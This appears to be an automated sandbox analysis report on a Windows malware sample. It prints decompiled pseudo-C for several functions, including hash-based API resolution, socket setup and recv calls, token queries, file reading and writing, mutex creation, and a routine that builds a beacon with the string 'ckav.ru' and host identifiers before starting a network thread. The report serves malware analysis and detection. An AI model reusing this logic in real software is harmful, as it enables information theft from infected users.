                                            • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                            • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                            • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                            • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: recv
                                            • String ID:
                                            • API String ID: 1507349165-0
                                            • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                            • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                            • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                            • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                                            0x004061c3
                                            0x004061cb
                                            0x004061cd
                                            0x004061d0
                                            0x004061de
                                            0x004061e0
                                            0x004061e5
                                            0x004061e9
                                            0x004061eb
                                            0x004061ed
                                            0x004061f2
                                            0x0040622a
                                            0x00406230
                                            0x00406235
                                            0x00406239
                                            0x0040623b
                                            0x00406244
                                            0x00406249
                                            0x00406249
                                            0x0040624c
                                            0x00406253
                                            0x00406256
                                            0x00406258
                                            0x00406261
                                            0x00406266
                                            0x00406266
                                            0x00406270
                                            0x00406273
                                            0x00406276
                                            0x0040627b
                                            0x0040627e
                                            0x0040628c
                                            0x0040628e
                                            0x00406290
                                            0x00406295
                                            0x0040629a
                                            0x0040629e
                                            0x004062a0
                                            0x004062ac
                                            0x004062af
                                            0x004062b7
                                            0x004062b9
                                            0x004062c9
                                            0x004062e0
                                            0x004062e2
                                            0x004062e4
                                            0x004062f3
                                            0x004062f3
                                            0x004062e4
                                            0x004062f8
                                            0x004062fd
                                            0x004062a0
                                            0x004062fe
                                            0x00406302
                                            0x00406307
                                            0x0040630c
                                            0x0040630d
                                            0x0040630f
                                            0x00406312
                                            0x00406317
                                            0x00406318
                                            0x0040631c
                                            0x0040631e
                                            0x00406321
                                            0x00406326
                                            0x00000000
                                            0x00406327
                                            0x004061f4
                                            0x004061ff
                                            0x00406208
                                            0x00406218
                                            0x0040621d
                                            0x00406224
                                            0x00406226
                                            0x00406228
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406228
                                            0x00406201
                                            0x00000000

                                            APIs
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                            • _wmemset.LIBCMT ref: 00406244
                                            • _wmemset.LIBCMT ref: 00406261
                                            • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: _wmemset$ErrorInformationLastToken
                                            • String ID: IDA$IDA
                                            • API String ID: 487585393-2020647798
                                            • Opcode ID: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                                            • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                            • Opcode Fuzzy Hash: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                                            • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                                            0x00404e1d
                                            0x00404e26
                                            0x00404e2a
                                            0x00404e2f
                                            0x00404e37
                                            0x00404e3a
                                            0x00404e45
                                            0x00404e4f
                                            0x00404e57
                                            0x00404e61
                                            0x00404e66
                                            0x00404e68
                                            0x00404e6c
                                            0x00404e6e
                                            0x00404e7a
                                            0x00404e80
                                            0x00404e84
                                            0x00404e9f
                                            0x00404ea7
                                            0x00404eab
                                            0x00404eb1
                                            0x00404eb1
                                            0x00404eb6
                                            0x00404ebe
                                            0x00404ecb
                                            0x00000000
                                            0x00404ec0
                                            0x00404ec1
                                            0x00404ec7
                                            0x00404ec7
                                            0x00404ecd
                                            0x00000000
                                            0x00404ece
                                            0x00404ebe
                                            0x00404e87
                                            0x00404e90
                                            0x00000000
                                            0x00404e90
                                            0x00000000

                                            APIs
                                            • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                            • socket.WS2_32(?,?,?), ref: 00404E7A
                                            • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: freeaddrinfogetaddrinfosocket
                                            • String ID:
                                            • API String ID: 2479546573-0
                                            • Opcode ID: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                                            • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                            • Opcode Fuzzy Hash: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                                            • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 74%
                                            			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                                            0x004040c4
                                            0x004040ce
                                            0x004040d0
                                            0x004040e8
                                            0x004040ea
                                            0x004040ec
                                            0x004040f2
                                            0x0040418d
                                            0x00404190
                                            0x00404184
                                            0x00000000
                                            0x00404184
                                            0x004041a0
                                            0x004041a5
                                            0x004041a7
                                            0x00000000
                                            0x00000000
                                            0x004041a9
                                            0x004041b6
                                            0x004041b8
                                            0x004041be
                                            0x004041cb
                                            0x004041d0
                                            0x004041d1
                                            0x004041d3
                                            0x004041d8
                                            0x004041dc
                                            0x00000000
                                            0x004041e2
                                            0x00404100
                                            0x0040410c
                                            0x00404111
                                            0x0040417a
                                            0x0040417a
                                            0x00000000
                                            0x0040411b
                                            0x0040411b
                                            0x00404120
                                            0x00404122
                                            0x00404122
                                            0x0040412c
                                            0x0040413a
                                            0x0040413c
                                            0x00404140
                                            0x00000000
                                            0x00404142
                                            0x0040414a
                                            0x00404155
                                            0x0040415a
                                            0x0040415e
                                            0x00404168
                                            0x00404174
                                            0x00404176
                                            0x00404176
                                            0x0040417d
                                            0x0040417e
                                            0x00000000
                                            0x00404183
                                            0x00404140

                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: File$AllocCreateReadVirtual
                                            • String ID: .tmp
                                            • API String ID: 3585551309-2986845003
                                            • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                            • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                            • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                            • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                                            0x0041386f
                                            0x0041387e
                                            0x00413885
                                            0x00413889
                                            0x0041388c
                                            0x00413890
                                            0x00413893
                                            0x00413897
                                            0x0041389a
                                            0x0041389e
                                            0x004138a1
                                            0x004138a5
                                            0x004138a8
                                            0x004138ac
                                            0x004138af
                                            0x004138b2
                                            0x004138b5
                                            0x004138b8
                                            0x004138bb
                                            0x004138bc
                                            0x004138c4
                                            0x004138c8
                                            0x004138cb
                                            0x004138cf
                                            0x004138d2
                                            0x004138d6
                                            0x004138d7
                                            0x004138df
                                            0x004138e3
                                            0x004138e4
                                            0x004138ea
                                            0x004138eb
                                            0x004138f1
                                            0x004138f5
                                            0x004138f9
                                            0x004138fd
                                            0x00413901
                                            0x00413905
                                            0x00413909
                                            0x0041390d
                                            0x00413911
                                            0x00413915
                                            0x00413919
                                            0x0041391d
                                            0x00413921
                                            0x00413925
                                            0x00413929
                                            0x0041392d
                                            0x00413931
                                            0x00413935
                                            0x00413939
                                            0x0041393d
                                            0x00413941
                                            0x00413950
                                            0x00413959
                                            0x0041395f
                                            0x00413968
                                            0x0041396e
                                            0x00413973
                                            0x00413977
                                            0x00413979
                                            0x00413980
                                            0x00413982
                                            0x00413991
                                            0x0041399c
                                            0x0041399e
                                            0x004139a4
                                            0x004139a9
                                            0x004139ac
                                            0x004139b1
                                            0x004139b1
                                            0x004139b2
                                            0x004139b7
                                            0x004139bc
                                            0x004139c1
                                            0x004139c7
                                            0x004139cd
                                            0x004139cd
                                            0x004139db

                                            APIs
                                            • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                            • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                            • GetLastError.KERNEL32 ref: 0041399E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Error$CreateLastModeMutex
                                            • String ID:
                                            • API String ID: 3448925889-0
                                            • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                            • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                            • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                            • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                                            0x004042cf
                                            0x004042d5
                                            0x004042df
                                            0x004042e2
                                            0x004042f9
                                            0x004042fb
                                            0x00404300
                                            0x0040430a
                                            0x00404314
                                            0x00404319
                                            0x00404323
                                            0x00404334
                                            0x0040433b
                                            0x0040433b
                                            0x0040433f
                                            0x00404344
                                            0x0040434c

                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                            • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreatePointerWrite
                                            • String ID:
                                            • API String ID: 3672724799-0
                                            • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                            • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                            • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                            • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 34%
                                            			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                                            0x00412d31
                                            0x00412d34
                                            0x00412d39
                                            0x00412d3c
                                            0x00412d49
                                            0x00412d50
                                            0x00412d52
                                            0x00412f24
                                            0x00412f24
                                            0x00412f2b
                                            0x00412f30
                                            0x00412f32
                                            0x00412f37
                                            0x00412f41
                                            0x00412f53
                                            0x00412f53
                                            0x00412f5b
                                            0x00412f60
                                            0x00412d58
                                            0x00412d58
                                            0x00412d63
                                            0x00412d6c
                                            0x00412d73
                                            0x00412d7e
                                            0x00412d7f
                                            0x00412d80
                                            0x00412d81
                                            0x00412d82
                                            0x00412d8f
                                            0x00412da1
                                            0x00412da6
                                            0x00412dae
                                            0x00412db0
                                            0x00412db1
                                            0x00412db5
                                            0x00412dce
                                            0x00412dcf
                                            0x00412dd5
                                            0x00412dda
                                            0x00412db7
                                            0x00412db7
                                            0x00412db8
                                            0x00412dbe
                                            0x00412dc4
                                            0x00412dc9
                                            0x00412dc9
                                            0x00412de2
                                            0x00412de4
                                            0x00412de5
                                            0x00412de7
                                            0x00412de9
                                            0x00412e02
                                            0x00412e03
                                            0x00412e09
                                            0x00412e0e
                                            0x00412deb
                                            0x00412deb
                                            0x00412dec
                                            0x00412df2
                                            0x00412df8
                                            0x00412dfd
                                            0x00412dfd
                                            0x00412e11
                                            0x00412e17
                                            0x00412e19
                                            0x00412e1a
                                            0x00412e1e
                                            0x00412e37
                                            0x00412e38
                                            0x00412e3e
                                            0x00412e43
                                            0x00412e20
                                            0x00412e20
                                            0x00412e21
                                            0x00412e27
                                            0x00412e2d
                                            0x00412e32
                                            0x00412e32
                                            0x00412e4b
                                            0x00412e4d
                                            0x00412e4f
                                            0x00412e7e
                                            0x00412e8a
                                            0x00412e8f
                                            0x00412e51
                                            0x00412e59
                                            0x00412e67
                                            0x00412e6d
                                            0x00412e72
                                            0x00412e72
                                            0x00412e9e
                                            0x00412eaf
                                            0x00412eb4
                                            0x00412ec0
                                            0x00412ece
                                            0x00412edc
                                            0x00412eea
                                            0x00412ef8
                                            0x00412f0f
                                            0x00412f14
                                            0x00412f14
                                            0x00412f17
                                            0x00412f1d
                                            0x00412f1f
                                            0x00000000
                                            0x00412f1f
                                            0x00412f74

                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                              • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                              • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
